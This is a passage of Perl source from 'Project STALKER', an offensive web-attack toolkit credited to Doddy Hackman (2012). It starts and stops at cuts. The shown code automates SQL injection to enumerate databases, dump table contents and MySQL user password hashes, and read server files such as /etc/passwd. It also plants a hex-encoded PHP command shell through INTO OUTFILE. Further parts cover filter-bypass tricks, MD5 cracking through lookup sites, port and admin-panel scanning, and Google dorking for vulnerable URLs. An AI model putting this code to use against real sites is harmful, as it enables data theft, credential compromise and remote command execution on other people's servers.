- print "[load_file] : ON\n";
- savefile(
- $save . ".txt",
- "[load_file] : "
- . $start
- . "unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))))"
- . $end
- . $pass2
- );
- }
- $concat =
- "unhex(hex(concat(char(69,82,84,79,82,56,53,52),version(),char(69,82,84,79,82,56,53,52),database(),char(69,82,84,79,82,56,53,52),user(),char(69,82,84,79,82,56,53,52))))";
- $injection = $start . $concat . $end . $pass2;
- $code = toma($injection);
- if ( $code =~ /ERTOR854(.*)ERTOR854(.*)ERTOR854(.*)ERTOR854/g ) {
- print
- "\n[!] DB Version : $1\n[!] DB Name : $2\n[!] user_name : $3\n\n";
- savefile(
- $save . ".txt",
- "\n[!] DB Version : $1\n[!] DB Name : $2\n[!] user_name : $3\n"
- );
- }
- else {
- print "\n[-] Not found any data\n";
- }
- }
- }
- sub menu_options {
- my $save = partimealmedio( $_[0] );
- print "\n/logs/webs/$save>";
- chomp( my $rta = <stdin> );
- if ( $rta =~ /help/ ) {
- print qq(
- Commands :
- details
- tables
- columns <table>
- dbs
- othertable <db>
- othercolumn <db> <table>
- mysqluser
- dumper <table> <column1> <column2>
- createshell
- readfile
- logs
- exit
- );
- }
- if ( $rta =~ /tables/ ) {
- schematables( $_[0], $_[1], $save );
- &reload;
- }
- elsif ( $rta =~ /columns (.*)/ ) {
- my $tabla = $1;
- schemacolumns( $_[0], $_[1], $save, $tabla );
- &reload;
- }
- elsif ( $rta =~ /dbs/ ) {
- &schemadb( $_[0], $_[1], $save );
- &reload;
- }
- elsif ( $rta =~ /othertable (.*)/ ) {
- my $data = $1;
- &schematablesdb( $_[0], $_[1], $data, $save );
- &reload;
- }
- elsif ( $rta =~ /othercolumn (.*) (.*)/ ) {
- my ( $db, $table ) = ( $1, $2 );
- &schemacolumnsdb( $_[0], $_[1], $db, $table, $save );
- &reload;
- }
- elsif ( $rta =~ /mysqluser/ ) {
- &mysqluser( $_[0], $_[1], $save );
- &reload;
- }
- elsif ( $rta =~ /logs/ ) {
- $t = "logs/webs/$save.txt";
- system("start $t");
- &reload;
- }
- elsif ( $rta =~ /exit/ ) {
- next;
- }
- elsif ( $rta =~ /createshell/ ) {
- print "\n\n[Full Path Discloure] : ";
- chomp( my $path = <STDIN> );
- &into( $_[0], $_[1], $path, $save );
- }
- elsif ( $rta =~ /readfile/ ) {
- loadfile( $_[0], $_[1], $save );
- }
- elsif ( $rta =~ /dumper (.*) (.*) (.*)/ ) {
- my ( $tabla, $col1, $col2 ) = ( $1, $2, $3 );
- &dump( $_[0], $col1, $col2, $tabla, $_[1], $save );
- &reload;
- }
- elsif ( $rta =~ /details/ ) {
- &details( $_[0], $_[1], $save );
- &reload;
- }
- else {
- &reload;
- }
- }
- sub schematables {
- $real = "1";
- my ( $page, $bypass, $save ) = @_;
- savefile( $save . ".txt", "\n" );
- print "\n";
- my $page1 = $page;
- ( $pass1, $pass2 ) = &bypass( $_[1] );
- savefile( $save . ".txt", "[DB] : default" );
- print "\n[+] Searching tables with schema\n\n";
- $page =~
- s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),table_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
- $page1 =~
- s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
- $code =
- toma( $page1
- . $pass1 . "from"
- . $pass1
- . "information_schema.tables"
- . $pass2 );
- if ( $code =~ /RATSXPDOWN1(.*)RATSXPDOWN1/ig ) {
- my $resto = $1;
- $total = $resto - 17;
- print "[+] Tables Length : $total\n\n";
- savefile( $save . ".txt", "[+] Searching tables with schema\n" );
- savefile( $save . ".txt", "[+] Tables Length : $total\n" );
- my $limit = $1;
- for my $limit ( 17 .. $limit ) {
- $code1 =
- toma( $page
- . $pass1 . "from"
- . $pass1
- . "information_schema.tables"
- . $pass1 . "limit"
- . $pass1
- . $limit . ",1"
- . $pass2 );
- if ( $code1 =~ /RATSXPDOWN1(.*)RATSXPDOWN1/ig ) {
- my $table = $1;
- chomp $table;
- print "[Table $real Found : $table ]\n";
- savefile( $save . ".txt", "[Table $real Found : $table ]" );
- $real++;
- }
- }
- print "\n";
- }
- else {
- print "\n[-] information_schema = ERROR\n";
- }
- }
- sub reload {
- &menu_options( $_[0] );
- }
- sub schemacolumns {
- my ( $page, $bypass, $save, $table ) = @_;
- my $page3 = $page;
- my $page4 = $page;
- savefile( $save . ".txt", "\n" );
- print "\n";
- ( $pass1, $pass2 ) = &bypass($bypass);
- print "\n[DB] : default\n";
- savefile( $save . ".txt", "[DB] : default" );
- savefile( $save . ".txt", "[Table] : $table\n" );
- $page3 =~
- s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
- $code3 =
- toma( $page3
- . $pass1 . "from"
- . $pass1
- . "information_schema.columns"
- . $pass1 . "where"
- . $pass1
- . "table_name=char("
- . ascii($table) . ")"
- . $pass2 );
- if ( $code3 =~ /RATSXPDOWN1(.*)RATSXPDOWN1/ig ) {
- print "\n[Columns Length : $1 ]\n\n";
- savefile( $save . ".txt", "[Columns Length : $1 ]\n" );
- my $si = $1;
- chomp $si;
- $page4 =~
- s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),column_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
- $real = "1";
- for my $limit2 ( 0 .. $si ) {
- $code4 =
- toma( $page4
- . $pass1 . "from"
- . $pass1
- . "information_schema.columns"
- . $pass1 . "where"
- . $pass1
- . "table_name=char("
- . ascii($table) . ")"
- . $pass1 . "limit"
- . $pass1
- . $limit2 . ",1"
- . $pass2 );
- if ( $code4 =~ /RATSXPDOWN1(.*)RATSXPDOWN1/ig ) {
- print "[Column $real] : $1\n";
- savefile( $save . ".txt", "[Column $real] : $1" );
- $real++;
- }
- }
- print "\n";
- }
- else {
- print "\n[-] information_schema = ERROR\n";
- }
- }
- sub schemadb {
- my ( $page, $bypass, $save ) = @_;
- my $page1 = $page;
- savefile( $save . ".txt", "\n" );
- print "\n\n[+] Searching DBS\n\n";
- ( $pass1, $pass2 ) = &bypass($bypass);
- $page =~
- s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
- $code =
- toma( $page . $pass1 . "from" . $pass1 . "information_schema.schemata" );
- if ( $code =~ /RATSXPDOWN1(.*)RATSXPDOWN1/ig ) {
- my $limita = $1;
- print "[+] Databases Length : $limita\n\n";
- savefile( $save . ".txt", "[+] Databases Length : $limita\n" );
- $page1 =~
- s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),schema_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
- $real = "1";
- for my $limit ( 0 .. $limita ) {
- $code =
- toma( $page1
- . $pass1 . "from"
- . $pass1
- . "information_schema.schemata"
- . $pass1 . "limit"
- . $pass1
- . $limit . ",1"
- . $pass2 );
- if ( $code =~ /RATSXPDOWN1(.*)RATSXPDOWN1/ig ) {
- my $control = $1;
- if ( $control ne "information_schema"
- and $control ne "mysql"
- and $control ne "phpmyadmin" )
- {
- print "[Database $real Found] $control\n";
- savefile( $save . ".txt",
- "[Database $real Found] : $control" );
- $real++;
- }
- }
- }
- print "\n";
- }
- else {
- print "[-] information_schema = ERROR\n";
- }
- }
- sub schematablesdb {
- my $page = $_[0];
- my $db = $_[2];
- my $page1 = $page;
- savefile( $_[3] . ".txt", "\n" );
- print "\n\n[+] Searching tables with DB $db\n\n";
- ( $pass1, $pass2 ) = &bypass( $_[1] );
- savefile( $_[3] . ".txt", "[DB] : $db" );
- $page =~
- s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),table_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
- $page1 =~
- s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
- $code =
- toma( $page1
- . $pass1 . "from"
- . $pass1
- . "information_schema.tables"
- . $pass1 . "where"
- . $pass1
- . "table_schema=char("
- . ascii($db) . ")"
- . $pass2 );
- #print $page.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass2."\n";
- if ( $code =~ /RATSXPDOWN1(.*)RATSXPDOWN1/ig ) {
- print "[+] Tables Length : $1\n\n";
- savefile( $_[3] . ".txt", "[+] Tables Length : $1\n" );
- my $limit = $1;
- $real = "1";
- for my $lim ( 0 .. $limit ) {
- $code1 =
- toma( $page
- . $pass1 . "from"
- . $pass1
- . "information_schema.tables"
- . $pass1 . "where"
- . $pass1
- . "table_schema=char("
- . ascii($db) . ")"
- . $pass1 . "limit"
- . $pass1
- . $lim . ",1"
- . $pass2 );
- #print $page.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass1."limit".$pass1.$lim.",1".$pass2."\n";
- if ( $code1 =~ /RATSXPDOWN1(.*)RATSXPDOWN1/ig ) {
- my $table = $1;
- chomp $table;
- savefile( $_[3] . ".txt", "[Table $real Found : $table ]" );
- print "[Table $real Found : $table ]\n";
- $real++;
- }
- }
- print "\n";
- }
- else {
- print "\n[-] information_schema = ERROR\n";
- }
- }
- sub schemacolumnsdb {
- my ( $page, $bypass, $db, $table, $save ) = @_;
- my $page3 = $page;
- my $page4 = $page;
- print "\n\n[+] Searching columns in table $table with DB $db\n\n";
- savefile( $save . ".txt", "\n" );
- ( $pass1, $pass2 ) = &bypass( $_[1] );
- savefile( $save . ".txt", "\n[DB] : $db" );
- savefile( $save . ".txt", "[Table] : $table" );
- $page3 =~
- s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
- $code3 =
- toma( $page3
- . $pass1 . "from"
- . $pass1
- . "information_schema.columns"
- . $pass1 . "where"
- . $pass1
- . "table_name=char("
- . ascii($table) . ")"
- . $pass1 . "and"
- . $pass1
- . "table_schema=char("
- . ascii($db) . ")"
- . $pass2 );
- if ( $code3 =~ /RATSXPDOWN1(.*)RATSXPDOWN1/ig ) {
- print "\n[Columns length : $1 ]\n\n";
- savefile( $save . ".txt", "[Columns length : $1 ]\n" );
- my $si = $1;
- chomp $si;
- $page4 =~
- s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),column_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
- $real = "1";
- for my $limit2 ( 0 .. $si ) {
- $code4 =
- toma( $page4
- . $pass1 . "from"
- . $pass1
- . "information_schema.columns"
- . $pass1 . "where"
- . $pass1
- . "table_name=char("
- . ascii($table) . ")"
- . $pass1 . "and"
- . $pass1
- . "table_schema=char("
- . ascii($db) . ")"
- . $pass1 . "limit"
- . $pass1
- . $limit2 . ",1"
- . $pass2 );
- if ( $code4 =~ /RATSXPDOWN1(.*)RATSXPDOWN1/ig ) {
- print "[Column $real] : $1\n";
- savefile( $save . ".txt", "[Column $real] : $1" );
- $real++;
- }
- }
- }
- else {
- print "\n[-] information_schema = ERROR\n";
- }
- print "\n";
- }
- sub mysqluser {
- my ( $page, $bypass, $save ) = @_;
- my $cop = $page;
- my $cop1 = $page;
- savefile( $save . ".txt", "\n" );
- print "\n\n[+] Finding mysql.users\n";
- ( $pass1, $pass2 ) = &bypass($bypass);
- $page =~ s/hackman/concat(char(82,65,84,83,88,80,68,79,87,78,49))/;
- $code = toma( $page . $pass1 . "from" . $pass1 . "mysql.user" . $pass2 );
- if ( $code =~ /RATSXPDOWN/ig ) {
- $cop1 =~
- s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
- $code1 =
- toma( $cop1 . $pass1 . "from" . $pass1 . "mysql.user" . $pass2 );
- if ( $code1 =~ /RATSXPDOWN1(.*)RATSXPDOWN1/ig ) {
- print "\n[+] Users Found : $1\n\n";
- savefile( $save . ".txt", "\n[+] Users mysql Found : $1\n" );
- for my $limit ( 0 .. $1 ) {
- $cop =~
- s/hackman/unhex(hex(concat(0x524154535850444f574e,Host,0x524154535850444f574e,User,0x524154535850444f574e,Password,0x524154535850444f574e)))/;
- $code =
- toma( $cop
- . $pass1 . "from"
- . $pass1
- . "mysql.user"
- . $pass1 . "limit"
- . $pass1
- . $limit . ",1"
- . $pass2 );
- if ( $code =~
- /RATSXPDOWN(.*)RATSXPDOWN(.*)RATSXPDOWN(.*)RATSXPDOWN/ig )
- {
- print "[Host] : $1 [User] : $2 [Password] : $3\n";
- savefile( $save . ".txt",
- "[Host] : $1 [User] : $2 [Password] : $3" );
- }
- else {
- print "\n";
- &reload;
- }
- }
- }
- }
- else {
- print "\n[-] mysql.user = ERROR\n\n";
- }
- }
- sub dump {
- savefile( $_[5] . ".txt", "\n" );
- my $page = $_[0];
- ( $pass1, $pass2 ) = &bypass( $_[4] );
- if ( $page =~ /(.*)hackman(.*)/ ) {
- my $start = $1;
- my $end = $2;
- print "\n\n[+] Extracting values...\n\n";
- $concatx =
- "unhex(hex(concat(char(69,82,84,79,82,56,53,52),count($_[1]),char(69,82,84,79,82,56,53,52))))";
- $val_code =
- toma( $start
- . $concatx
- . $end
- . $pass1 . "from"
- . $pass1
- . $_[3]
- . $pass2 );
- $concat =
- "unhex(hex(concat(char(69,82,84,79,82,56,53,52),$_[1],char(69,82,84,79,82,56,53,52),$_[2],char(69,82,84,79,82,56,53,52))))";
- if ( $val_code =~ /ERTOR854(.*)ERTOR854/ig ) {
- $tota = $1;
- print "[+] Table : $_[3]\n";
- print "[+] Length of the rows : $tota\n\n";
- print "[$_[1]] [$_[2]]\n\n";
- savefile( $_[5] . ".txt", "[Table] : $_[3]" );
- savefile( $_[5] . ".txt", "[+] Length of the rows: $tota\n" );
- savefile( $_[5] . ".txt", "[$_[1]] [$_[2]]\n" );
- for my $limit ( 0 .. $tota ) {
- chomp $limit;
- $injection =
- toma( $start
- . $concat
- . $end
- . $pass1 . "from"
- . $pass1
- . $_[3]
- . $pass1 . "limit"
- . $pass1
- . $limit . ",1"
- . $pass2 );
- if ( $injection =~ /ERTOR854(.*)ERTOR854(.*)ERTOR854/ig ) {
- savefile( $_[5] . ".txt", "[$_[1]] : $1 [$_[2]] : $2" );
- print "[$_[1]] : $1 [$_[2]] : $2\n";
- }
- else {
- print "\n\n[+] Extracting Finish\n\n";
- last;
- &reload;
- }
- }
- }
- else {
- print "[-] Not Found any DATA\n\n";
- }
- }
- }
- sub loadfile {
- savefile( $_[2] . ".txt", "\n" );
- ( $pass1, $pass2 ) = &bypass( $_[1] );
- if ( $_[0] =~ /(.*)hackman(.*)/g ) {
- my $start = $1;
- my $end = $2;
- print "\n\n[+] File to read : ";
- chomp( my $file = <stdin> );
- $concat =
- "unhex(hex(concat(char(107,48,98,114,97),load_file("
- . encode($file)
- . "),char(107,48,98,114,97))))";
- my $code = toma( $start . $concat . $end . $pass2 );
- chomp $code;
- if ( $code =~ /k0bra(.*)k0bra/s ) {
- print "[File Found] : $file\n";
- print "\n[Source Start]\n\n";
- print $1;
- print "\n\n[Source End]\n\n";
- savefile( $_[2] . ".txt", "[File Found] : $file" );
- savefile( $_[2] . ".txt", "\n[Source Start]\n" );
- savefile( $_[2] . ".txt", "$1" );
- savefile( $_[2] . ".txt", "\n[Source End]\n" );
- }
- }
- &reload;
- }
- sub into {
- print "\n\n[Status] : Injecting a SQLI for create a shell\n\n";
- my ( $page, $bypass, $dir, $save ) = @_;
- savefile( $save . ".txt", "\n" );
- print "\n";
- ( $pass1, $pass2 ) = &bypass($bypass);
- my ( $scheme, $auth, $path, $query, $frag ) = uri_split($page);
- if ( $path =~ /\/(.*)$/ ) {
- my $path1 = $1;
- my $path2 = $path1;
- $path2 =~ s/$1//;
- $dir =~ s/$path1//ig;
- $shell = $dir . "/" . "shell.php";
- if ( $page =~ /(.*)hackman(.*)/ig ) {
- my ( $start, $end ) = ( $1, $2 );
- $code =
- toma( $start
- . "0x3c7469746c653e4d696e69205368656c6c20427920446f6464793c2f7469746c653e3c3f7068702069662028697373657428245f4745545b27636d64275d2929207b2073797374656d28245f4745545b27636d64275d293b7d3f3e"
- . $end
- . $pass1 . "into"
- . $pass1
- . "outfile"
- . $pass1 . "'"
- . $shell . "'"
- . $pass2 );
- $code1 =
- toma( "http://" . $auth . "/" . $path2 . "/" . "shell.php" );
- if ( $code1 =~ /Mini Shell By Doddy/ig ) {
- print "[shell up] : http://" . $auth . "/" . $path2 . "/"
- . "shell.php\a";
- savefile(
- $save . ".txt",
- "[shell up] : http://"
- . $auth . "/"
- . $path2 . "/"
- . "shell.php"
- );
- }
- else {
- print "[shell] : Not Found\n";
- }
- }
- }
- print "\n\n";
- &reload;
- }
- sub bypass {
- if ( $_[0] eq "/*" ) { return ( "/**/", "/*" ); }
- elsif ( $_[0] eq "%20" ) { return ( "%20", "%00" ); }
- else { return ( "+", "--" ); }
- }
- sub ascii {
- return join ',', unpack "U*", $_[0];
- }
- sub base {
- $re = encode_base64( $_[0] );
- chomp $re;
- return $re;
- }
- sub base_de {
- $re = decode_base64( $_[0] );
- chomp $re;
- return $re;
- }
- sub download {
- if ( $nave->mirror( $_[0], $_[1] ) ) {
- if ( -f $_[1] ) {
- return true;
- }
- }
- }
- sub hex_en {
- my $string = $_[0];
- $hex = '0x';
- for ( split //, $string ) {
- $hex .= sprintf "%x", ord;
- }
- return $hex;
- }
- sub hex_de {
- my $text = shift;
- $text =~ s/^0x//;
- $encode = join q[], map { chr hex } $text =~ /../g;
- return $encode;
- }
- sub ascii_de {
- my $text = shift;
- $text = join q[], map { chr } split q[,], $text;
- return $text;
- }
- sub getprocess {
- my %procesos;
- my $uno = Win32::OLE->new("WbemScripting.SWbemLocator");
- my $dos = $uno->ConnectServer( "", "root\\cimv2" );
- foreach my $pro ( in $dos->InstancesOf("Win32_Process") ) {
- $procesos{ $pro->{Caption} } = $pro->{ProcessId};
- }
- return %procesos;
- }
- sub killprocess {
- my $pid = shift;
- if ( Win32::Process::KillProcess( $pid, "" ) ) {
- return true;
- }
- else {
- return false;
- }
- }
- sub getip {
- my $get = gethostbyname( $_[0] );
- return inet_ntoa($get);
- }
- sub ftp {
- my ( $ftp, $user, $pass ) = @_;
- if ( my $socket = Net::FTP->new($ftp) ) {
- if ( $socket->login( $user, $pass ) ) {
- print "\n[+] Enter of the server FTP\n\n";
- menu:
- print "\n\nftp>";
- chomp( my $cmd = <stdin> );
- print "\n\n";
- if ( $cmd =~ /help/ ) {
- print q(
- help : show information
- cd : change directory <dir>
- dir : list a directory
- mdkdir : create a directory <dir>
- rmdir : delete a directory <dir>
- pwd : directory
- del : delete a file <file>
- rename : change name of the a file <file1> <file2>
- size : size of the a file <file>
- put : upload a file <file>
- get : download a file <file>
- cdup : change dir <dir>
- exit : ??
- );
- }
- if ( $cmd =~ /dir/ig ) {
- if ( my @files = $socket->dir() ) {
- for (@files) {
- print "[+] " . $_ . "\n";
- }
- }
- else {
- print "\n\n[-] Error\n\n";
- }
- }
- if ( $cmd =~ /pwd/ig ) {
- print "[+] Path : " . $socket->pwd() . "\n";
- }
- if ( $cmd =~ /cd (.*)/ig ) {
- if ( $socket->cwd($1) ) {
- print "[+] Directory changed\n";
- }
- else {
- print "\n\n[-] Error\n\n";
- }
- }
- if ( $cmd =~ /cdup/ig ) {
- if ( my $dir = $socket->cdup() ) {
- print "\n\n[+] Directory changed\n\n";
- }
- else {
- print "\n\n[-] Error\n\n";
- }
- }
- if ( $cmd =~ /del (.*)/ig ) {
- if ( $socket->delete($1) ) {
- print "[+] File deleted\n";
- }
- else {
- print "\n\n[-] Error\n\n";
- }
- }
- if ( $cmd =~ /rename (.*) (.*)/ig ) {
- if ( $socket->rename( $1, $2 ) ) {
- print "[+] File Updated\n";
- }
- else {
- print "\n\n[-] Error\n\n";
- }
- }
- if ( $cmd =~ /mkdir (.*)/ig ) {
- if ( $socket->mkdir($1) ) {
- print "\n\n[+] Directory created\n";
- }
- else {
- print "\n\n[-] Error\n\n";
- }
- }
- if ( $cmd =~ /rmdir (.*)/ig ) {
- if ( $socket->rmdir($1) ) {
- print "\n\n[+] Directory deleted\n";
- }
- else {
- print "\n\n[-] Error\n\n";
- }
- }
- if ( $cmd =~ /exit/ig ) {
- next;
- }
- if ( $cmd =~ /get (.*) (.*)/ig ) {
- print "\n\n[+] Downloading file\n\n";
- if ( $socket->get( $1, $2 ) ) {
- print "[+] Download completed";
- }
- else {
- print "\n\n[-] Error\n\n";
- }
- }
- if ( $cmd =~ /put (.*) (.*)/ig ) {
- print "\n\n[+] Uploading file\n\n";
- if ( $socket->put( $1, $2 ) ) {
- print "[+] Upload completed";
- }
- else {
- print "\n\n[-] Error\n\n";
- }
- }
- if ( $cmd =~ /quit/ ) {
- next;
- }
- goto menu;
- }
- else {
- print "\n[-] Failed the login\n\n";
- }
- }
- else {
- print "\n\n[-] Error\n\n";
- }
- }
- sub crackit {
- my $target = shift;
- chomp $target;
- my %hash = (
- 'http://md5.hashcracking.com/search.php?md5=' => {
- 'tipo' => 'get',
- 'regex' => "Cleartext of $target is (.*)",
- },
- 'http://www.hashchecker.com/index.php?_sls=search_hash' => {
- 'variables' => { 'search_field' => $target, 'Submit' => 'search' },
- 'regex' =>
- "<td><li>Your md5 hash is :<br><li>$target is <b>(.*)<\/b>",
- },
- 'http://md5.rednoize.com/?q=' => {
- 'tipo' => 'get',
- 'regex' => "<div id=\"result\" >(.*)<\/div>"
- },
- 'http://md52.altervista.org/index.php?md5=' => {
- 'tipo' => 'get',
- 'regex' => "<br>Password: <font color=\"Red\">(.*)<\/font><\/b>"
- }
- );
- for my $data ( keys %hash ) {
- if ( $hash{$data}{tipo} eq "get" ) {
- $code = toma( $data . $target );
- if ( $code =~ /$hash{$data}{regex}/ig ) {
- my $found = $1;
- unless ( $found =~ /\[Non Trovata\]/ ) {
- return $found;
- last;
- }
- }
- }
- else {
- $code = tomar( $data, $hash{$data}{variables} );
- if ( $code =~ /$hash{$data}{regex}/ig ) {
- my $found = $1;
- return $found;
- last;
- }
- }
- }
- return "false01";
- }
- sub ver_length {
- return true if length( $_[0] ) == 32;
- }
- sub scanpaths {
- my $urla = $_[0];
- print "\n[+] Find paths in $urla\n\n\n";
- my @urls = repes( get_links( toma($urla) ) );
- for $url (@urls) {
- my $web = $url;
- my ( $scheme, $auth, $path, $query, $frag ) = uri_split($url);
- if ( $_[0] =~ /$auth/ or $auth eq "" ) {
- if ( $path =~ /(.*)\/(.*)\.(.*)$/ ) {
- my $borrar = $2 . "." . $3;
- if ( $web =~ /(.*)$borrar/ ) {
- my $co = $1;
- unless ( $co =~ /$auth/ ) {
- $co = $urla . $co;
- }
- $code = toma($co);
- if ( $code =~ /Index Of/ig ) {
- print "[Link] : " . $co . "\n";
- saveyes( "logs/paths-found.txt", $co );
- }
- }
- }
- }
- }
- }
- sub scanport {
- my %ports = (
- "21" => "ftp",
- "22" => "ssh",
- "25" => "smtp",
- "80" => "http",
- "110" => "pop3",
- "3306" => "mysql"
- );
- print "[+] Scanning $_[0]\n\n\n";
- for my $port ( keys %ports ) {
- if (
- new IO::Socket::INET(
- PeerAddr => $_[0],
- PeerPort => $port,
- Proto => "tcp",
- Timeout => 0.5
- )
- )
- {
- print "[Port] : " . $port . " [Service] : " . $ports{$port} . "\n";
- }
- }
- print "\n\n[+] Finish\n";
- }
- sub scanpanel {
- print "[+] Scanning $_[0]\n\n\n";
- for $path (@panels) {
- $code = tomax( $_[0] . "/" . $path );
- if ( $code->is_success ) {
- print "[Link] : " . $_[0] . "/" . $path . "\n";
- saveyes( "logs/panel-logs.txt", $_[0] . "/" . $path );
- }
- }
- print "\n\n[+] Finish\n";
- }
- sub google {
- my ( $a, $b ) = @_;
- my @founds;
- for ( $pages = 10 ; $pages <= $b ; $pages = $pages + 10 ) {
- $code = toma(
- "http://www.google.com.ar/search?hl=&q=" . $a . "&start=$pages" );
- while ( $code =~ /(?<="r"><. href=")(.+?)"/mig ) {
- my $url = $1;
- if ( $url =~ /\/url\?q\=(.*?)\&\;/ ) {
- push( @founds, uri_unescape($1) );
- }
- }
- }
- my @founds = repes( cortar(@founds) );
- return @founds;
- }
- sub sql {
- my ( $pass1, $pass2 ) = ( "+", "--" );
- my $page = shift;
- $code1 =
- toma( $page . "-1"
- . $pass1 . "union"
- . $pass1
- . "select"
- . $pass1 . "666"
- . $pass2 );
- if ( $code1 =~
- /The used SELECT statements have a different number of columns/ig )
- {
- print "[+] SQLI : $page\a\n";
- saveyes( "logs/sql-logs.txt", $page );
- }
- }
- sub get_links {
- $test = HTML::LinkExtor->new( \&agarrar )->parse( $_[0] );
- return @links;
- sub agarrar {
- my ( $a, %b ) = @_;
- push( @links, values %b );
- }
- }
- sub repes {
- my @limpio;
- foreach $test (@_) {
- push @limpio, $test unless $repe{$test}++;
- }
- return @limpio;
- }
- sub cortar {
- my @nuevo;
- for (@_) {
- if ( $_ =~ /=/ ) {
- @tengo = split( "=", $_ );
- push( @nuevo, @tengo[0] . "=" );
- }
- else {
- push( @nuevo, $_ );
- }
- }
- return @nuevo;
- }
- sub head {
- cprint "\x0311"; #13
- print "\n\n-- == Project STALKER == --\n\n";
- cprint "\x030";
- }
- sub copyright {
- cprint "\x0311"; #13
- print "\n\n(C) Doddy Hackman 2012\n\n";
- cprint "\x030";
- }
- sub toma {
- return $nave->get( $_[0] )->content;
- }
- sub tomax {
- return $nave->get( $_[0] );
- }
- sub tomar {
- my ( $web, $var ) = @_;
- return $nave->post( $web, [ %{$var} ] )->content;
- }
- sub conectar {
- my $sockex = new IO::Socket::INET(
- PeerAddr => $_[0],
- PeerPort => $_[1],
- Proto => "tcp",
- Timeout => 5
- );
- print $sockex $_[2] . "\r\n";
- $sockex->read( $re, 5000 );
- $sockex->close;
- return $re . "\r\n";
- }
- sub enter {
- my ( $host, $user, $pass ) = @_;
- print "[+] Connecting to the server\n";
- $info = "dbi:mysql::" . $host . ":3306";
- if ( my $enter = DBI->connect( $info, $user, $pass, { PrintError => 0 } ) )
- {
- print "\n[+] Enter in the database";
- while (1) {
- print "\n\n\n[+] Query : ";
- chomp( my $ac = <stdin> );
- if ( $ac eq "exit" ) {
- $enter->disconnect;
- print "\n\n[+] Closing connection\n\n";
- last;
- }
- $re = $enter->prepare($ac);
- $re->execute();
- my $total = $re->rows();
- my @columnas = @{ $re->{NAME} };
- if ( $total eq "-1" ) {
- print "\n\n[-] Query Error\n";
- next;
- }
- else {
- print "\n\n[+] Result of the query\n";
- if ( $total eq 0 ) {
- print "\n\n[+] Not rows returned\n\n";
- }
- else {
- print "\n\n[+] Rows returned : " . $total . "\n\n\n";
- for (@columnas) {
- print $_. "\t\t";
- }
- print "\n\n";
- while ( @row = $re->fetchrow_array ) {
- for (@row) {
- print $_. "\t\t";
- }
- print "\n";
- }
- }
- }
- }
- }
- else {
- print "\n[-] Error connecting\n";
- }
- }
- sub encode {
- my $string = $_[0];
- $hex = '0x';
- for ( split //, $string ) {
- $hex .= sprintf "%x", ord;
- }
- return $hex;
- }
- sub saveyes {
- open( SAVE, ">>" . $_[0] );
- print SAVE $_[1] . "\n";
- close SAVE;
- }
- sub savefile {
- open( SAVE, ">>logs/webs/" . $_[0] );
- print SAVE $_[1] . "\n";
- close SAVE;
- }
- sub coleccionar {
- opendir DIR, $_[0];
- my @archivos = readdir DIR;
- close DIR;
- return @archivos;
- }
- sub infocon {
- my $target = shift;
- my $get = gethostbyname($target);
- my $target = inet_ntoa($get);
- print "[+] Getting info\n\n\n";
- $total =
- "http://www.melissadata.com/lookups/iplocation.asp?ipaddress=$target";
- $re = toma($total);
- if ( $re =~ /City<\/td><td align=(.*)><b>(.*)<\/b><\/td>/ ) {
- print "[+] City : $2\n";
- }
- else {
- print "[-] Not Found\n";
- copyright();
- }
- if ( $re =~ /Country<\/td><td align=(.*)><b>(.*)<\/b><\/td>/ ) {
- print "[+] Country : $2\n";
- }
- if ( $re =~ /State or Region<\/td><td align=(.*)><b>(.*)<\/b><\/td>/ ) {
- print "[+] State or Region : $2\n";
- }
- print "\n\n[+] Getting Hosts\n\n\n";
- my $code = toma( "http://www.ip-adress.com/reverse_ip/" . $target );
- while ( $code =~ /whois\/(.*?)\">Whois/g ) {
- my $dns = $1;
- chomp $dns;
- print "[DNS] : $dns\n";
- }
- }
- sub whois {
- my $ob = shift;
- my $code = tomar(
- "http://networking.ringofsaturn.com/Tools/whois.php",
- { "domain" => $ob, "submit" => "submit" }
- );
- my @chau = ( """, ">>>", "<<<" );
- if ( $code =~ /<pre>(.*?)<\/pre>/sig ) {
- my $resul = $1;
- chomp $resul;
- for my $cha (@chau) {
- $resul =~ s/$cha//ig;
- }
- if ( $resul =~ /Whois Server Version/ ) {
- return $resul;
- }
- else {
- return "Not Found";
- }
- }
- }
- sub partimealmedio {
- my ( $scheme, $auth, $path, $query, $frag ) = uri_split( $_[0] );
- my $save = $auth;
- $save =~ s/:/_/;
- return $save;
- }
- sub helpme {
- cprint "\x035";
- print qq(
- This program was coded By Doddy Hackman in the year 2012
- [+] Commands :
- [++] cmd_getinfo [Windows Only]
- [++] cmd_getip <host>
- [++] cmd_getlink <page>
- [++] cmd_getprocess [Windows Only]
- [++] cmd_killprocess <pid process> [Windows Only]
- [++] cmd_conec <host> <port> <command>
- [++] cmd_allow <host>
- [++] cmd_paths <page>
- [++] cmd_encodehex <text>
- [++] cmd_decodehex <text>
- [++] cmd_encodeascii <text>
- [++] cmd_decodeascii <text>
- [++] cmd_encodebase <text>
